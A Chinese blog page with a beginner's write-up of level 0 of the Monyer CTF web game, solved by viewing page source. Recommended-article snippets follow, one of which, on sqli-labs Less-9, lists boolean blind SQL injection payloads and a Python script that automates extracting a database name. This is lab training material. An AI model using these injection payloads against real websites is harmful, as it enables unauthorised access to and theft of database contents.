靶场-梦之光芒第0关

最新推荐文章于 2025-07-23 19:00:25 发布
最新推荐文章于 2025-07-23 19:00:25 发布
阅读量224 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leesinalps/article/details/106076338

第0关:

偶然的情况下收到一个靶场,接下来我将以一个小白的姿态去感受信息安全的魅力以及,在学习路途中所碰到的一些问题,怎样解决的这些问题,我不打算把他当成一篇标准的技术博客来写,算是分享一些自己在学习上的一些记录。

靶场地址:

http://monyer.com/game/game1/

请看题:

题目描述:
欢迎来到梦之光芒的小游戏。
玩这个游戏,您需要有JS加解密基础,SQL注入基本常识等…
如果您参加本游戏,则视为您已经同意“这仅仅是个小游戏”这个原则,所以请不要在技术上过于较真,谢谢!
本游戏所有权归Monyer所有,但您每过一关,您有权利在不通知Monyer的情况下保留代码。不当的地方还请批评指教!

请点击链接进入第1关: 连接在左边→ ←连接在右边

题目提示很多的人可能这个都没有进去,这是作者跟打家开的一个小玩笑,大家可以使用的方法有:

方法图片
鼠标右键查看在这里插入图片描述
ctrl+shift+i***
修改url(此方法在禁用鼠标右键的时候也可以使用),在连接前加入(引号中的内容)“view-source:”在这里插入图片描述

寻找答案

在这里插入图片描述已得到第一关url地址

拓展知识:

  • 查看源代码的三种方法
  • 实现快速定位代码位置
DC靶场系列-DC1靶场-渗透测试靶场
03-09
而DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第一个练习环境。DC1靶场通常包含一系列的卡,每一个卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场详细...
DC靶场系列-DC9靶场-渗透测试靶场
03-06
在信息安全领域,渗透测试是评估网络安全的有效手段之一。渗透测试人员通过模拟攻击的方式,尝试发现系统中存在的安全漏洞,以便及时修补。DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许...
梦之光芒小游戏
qq_45628145的博客
05-04 728
首页 查看源码,进入第一 第一 查看源码,得到密码是两个空格,以及第二地址hello.php 第二 要我们计算密码a的值,把代码丢进控制台,得到密码 第三 eval改成alert,丢进控制台 得到密码d4g 第四 进入之后发现自动返回第三,但我们可以直接看第四的源码,因为知道第四的地址是d4g.php 把两个eval改成alert,丢进控制台 toUpperCas...
梦之光芒的小游戏
m2a3181的博客
07-19 212
0 在页面源码种找到第一入口 第1 查看页面源码,发现主要验证函数,可以输入对应的值(复制,粘贴一下就好),或者直接输入hello.php跳转到第三 第2 发现鼠标右键没反应,只能F12查看源代码了。在js中第一行定义了禁用鼠标右键 后面的函数定义了如何通过检查,可以看到需要经过一系列运算,计算出a的值,我们不用自己手算。直接复制下来,在浏览器中执行即可 第3 查看页面源代码,发现一段js代码 复制eval函数中的代码,在浏览器控制台进行执行,得到输出结果 显示,只要输入d4g就能通过验
梦之光芒的小游戏解题过程(爬坑)第一篇博客
weixin_34378922的博客
05-01 401
部分学习简书为:yfgeek 的大牛,感谢 第零 地址:http://monyer.com/game/game1/ 直接查看源代码 看到一个first.php 把first.php加到连接后面到下一 第一 地址:http://monyer.com/game/game1/first.php 提示请输入密码进入第二,果断看源代码,发现 1 function...
【CTF】梦之光芒/Monyer的游戏闯记录
x1a0he1的博客
07-17 4212
eGl的梦之光芒Game1解题记录 刚接触安全的时候偶然间发现了这个小游戏,当时凭自己一点点的基础知识闯过了4、5这样子,然后就一头雾水了。这个游戏也一直躺在我的收藏夹里。不想前几天偶然打开发现和ctf题目很类似。于是又捡了起来并通了,见证了自己的成长很开心。这里做一下解题思路的记录吧。 游戏网址:http://monyer.com/game/game1/ 第0: 看到页面提示想到审查...
梦之光芒/Monyer game1 writeup (0-5)
yy10992的专栏
05-26 431
Level 0 http://monyer.com/game/game1/ 看到这个网页,根据提示点击“请点击链接进入第1:连接在左边→←连接在右边”发现没有跳转。想到F12查看源代码。找到中间的元素<a href="first.php"></a>,点击链接,进入下一。 Level 1 http://monyer.com/game/game1/first.php 页面无可用信息,F12查看原代码。找到如下信息: 这段代码的意思是如果输入为两个空格,..
网络安全 - Web 安全靶场 - DVWA-2.3.zip
10-09
每个级别都设计有不同的安全防护措施,渗透难度也随之增加。这为用户提供了一个循序渐进的学习过程,有助于逐步掌握各种安全漏洞的防范和应对策略。 DVWA包含了如Brute Force(暴力破解)、Command Injection(命令...
网络安全 - 综合靶场 - PIKACHU 源码包 - pikachu-master.zip
09-22
这个源码包通常包含了 PIKACHU 靶场的全部代码,可以部署到本地服务器上进行学习和测试。 ### 主要特点 - **多漏洞场景**:包括但不限于 XSS(跨站脚本攻击)、SQL 注入、CSRF(跨站请求伪造)、文件上传漏洞、文件...
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
...它提供了一个全面的练习平台...在搭建过程中,用户需要特别注意修改db-creds.inc文件中的数据库连接信息,确保靶场能够正确连接到MySQL数据库。此外,还需要根据PHP的版本和环境的配置,进行适当的调整和测试,以确保
梦之光芒ctf小游戏闯过程
小清华的小哥哥
10-15 2360
梦之光芒ctf游戏闯 简介:玩这个游戏,您需要有JS,编码解码,XSS,SQL注入,图片隐写,逆向分析等基本常识… 游戏地址:http://monyer.com/game/game1 进入第1: 入口提示:请点击链接进入第1: 连接在左边→ ←连接在右边。但是看了看并有发现可点击的链接,因此进行常规操作:检查元素(或查看页面源代码),此时“first.php”映入眼帘。 得到第1入口地址:http://monyer.com/game/game1/first.php 进入第2: 题目除了一个文本输
使用Chrome 浏览器调试移动端网页 chrome://inspect/#devices
热门推荐
又是再见?
09-05 12万+
我使用的是小米(红米NOTE2 ),电脑是win 10 系统,以下几步就可以轻松使用浏览器内置的功能调试移动端网页了: 1. 手机开启调试模式连接电脑,确保是调试模式连接的(不知道怎么打开调试模式的可以参考:http://jingyan.baidu.com/article/046a7b3ee3b565f9c27fa9b2.html); 2. 手机上打开一个网页,只要是webview形式的网页应
如何在手机上查看网页源码
qq_45862302的博客
01-11 2万+
如何在手机上查询网页的源代码 下载一个Via浏览器 在页面输入网址 进入后点击 点击工具箱 4. 点击源码 5. 还可以设置离线页面 6. 总结 还是用电脑舒服 ...
MySql-错误'Access denied for user 'John'@'localhost' (using password: YES)
chuishidao30073的博客
09-02 129
John是我的电脑名称,我jdbc配置文件name明明写的是root,编译好的文件也是root,百度了半天找不要原因,不管了,既然没有这个MySQL用户我自己就创建个 1、用root用户登录mysql,创建新的用户 create user 'John'@'localhost' IDEN...
听说想当黑客的都玩过这个Monyer游戏
永恒之蓝的博客
02-28 3万+
第零 进入传送门开始第0(游戏链接) 请点击链接进入第1: 连接在左边→ ←连接在右边 看不到啊。。。。(只能看到一堆大佬做完的留名,也能看到菜鸡的我,在后面~~) 直接fn+f12吧 <span>连接在左边→</span> <a href="first.php"></a> <span>←连接在右边</span> o...
如何从Kubernetes集群中安全移除节点
最新发布
xcbeyond|疯狂源自梦想,技术成就辉煌
07-23 918
从 API Server 中移除节点对象,kube-controller-manager 停止监控该节点。通过遵循本指南,您将能够高效安全地管理Kubernetes节点生命周期,确保集群稳定运行。在 Kubernetes 集群的生命周期中,节点维护是不可避免的操作。本指南将详细介绍安全移除节点的全流程,确保操作平滑无感知。的标准流程,配合完善的预检和验证,可确保服务零中断。,阻止新Pod调度到该节点,但现有Pod继续运行。
网络初级安全第三次作业
2302_81663869的博客
07-22 478
通用容器标签,用于分组其他元素,便于通过 CSS 统一样式或通过 JavaScript 操作。一级标题标签,用于显示页面的主要标题(此处为 “账户登录”),具有语义化含义,也影响搜索引擎排名。包含 CSS 样式代码,用于控制页面元素的布局和外观(如颜色、大小、间距等)。包含 JavaScript 代码,用于实现交互逻辑(如表单验证、提交处理等)。包含页面的元数据(不直接显示在页面上的信息),如字符集、标题、样式等。定义页面标题,显示在浏览器标签页上,也用于搜索引擎索引。表单标签,用于创建用户输入表单。
4G车载录像机的作用详解:提升行车安全与智能管理的核心技术
索迪迈科技
07-22 651
随着物流运输、公共交通、特种车辆等行业对安全与管理需求的提升,4G车载录像机已成为现代车辆智能化管理的重要组成部分。它不仅具备传统行车记录仪的录像功能,还结合4G无线通信、AI智能分析、GPS定位、云存储等技术,实现远程监控、实时调度、驾驶员行为管理等功能。本文将详细解析4G车载录像机的作用,涵盖其在安全管理、车队运营、事故处理、数据管理等方面的核心价值。
sqli-labs靶场第九
06-19
### 于SQLi-Labs第九的解法与提示 SQLi-Labs第九主要涉及的是布尔盲注技术[^1]。在这一中,目标是通过构造特定的SQL语句来判断数据库中的字段数以及提取出敏感信息。以下是一些键点和提示: #### 判断字段数量 可以通过`ORDER BY`语句来确定表中的字段数量。例如,尝试访问以下URL以判断字段数: ```text http://10.40.1.22/sqli-labs-master/Less-9/?id=1' order by 3 --+ http://10.40.1.22/sqli-labs-master/Less-9/?id=1' order by 4 --+ ``` 如果页面正常显示,则说明当前`ORDER BY`值小于等于实际字段数;如果页面报错或异常,则说明当前`ORDER BY`值大于实际字段数。通过这种方式可以逐步确定字段数量为3。 #### 提取数据库信息 在确定字段数后,可以使用布尔盲注技术逐位提取数据库中的信息。例如,通过`SUBSTR`函数结合条件判断来提取数据库名称的第一个字符是否为特定值: ```text http://10.40.1.22/sqli-labs-master/Less-9/?id=1' and substr(database(),1,1)='s' -- ``` 上述语句用于判断数据库名称的第一个字符是否为`s`。如果页面正常显示,则说明条件成立;否则说明条件不成立。通过不断调整字符位置和值,可以逐步还原整个数据库名称[^2]。 #### 使用ASCII码进行逐位判断 为了更精确地提取信息,可以结合`ASCII`函数对每个字符的ASCII值进行判断。例如: ```text http://10.40.1.22/sqli-labs-master/Less-9/?id=1' and ascii(substr((select database()),1,1))>99 -- ``` 上述语句用于判断数据库名称第一个字符的ASCII值是否大于99。通过二分法或其他方式逐步缩小范围,最终可以确定每个字符的具体值[^3]。 #### 联合查询提取列名 如果需要进一步提取表中的列名,可以使用联合查询(`UNION SELECT`)技术。例如: ```text http://10.40.1.22/sqli-labs-master/Less-9/?id=-1' union select 1,column_name from information_schema.columns where table_schema=database() and table_name='users' -- ``` 上述语句将从`information_schema.columns`表中提取出`users`表的所有列名,并通过联合查询将其展示在页面上[^4]。 ### 注意事项 - 在布尔盲注过程中,需要耐心地逐位提取信息,这可能需要多次尝试。 - 如果目标系统存在防御机制(如WAF),可能需要对payload进行适当编码或变形以绕过检测。 - 确保在合法授权的情况下进行渗透测试,避免违反相法律法规。 ```python # 示例代码:自动化提取数据库名称 import requests url = "http://10.40.1.22/sqli-labs-master/Less-9/?id=1'" db_name = "" for i in range(1, 20): # 假设数据库名称长度不超过20 low, high = 0, 127 while low <= high: mid = (low + high) // 2 payload = f"' and ascii(substr(database(),{i},1))>{mid} --" response = requests.get(url + payload) if "You are in" in response.text: # 根据页面内容判断条件是否成立 low = mid + 1 else: high = mid - 1 db_name += chr(low) print(f"当前已提取到: {db_name}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值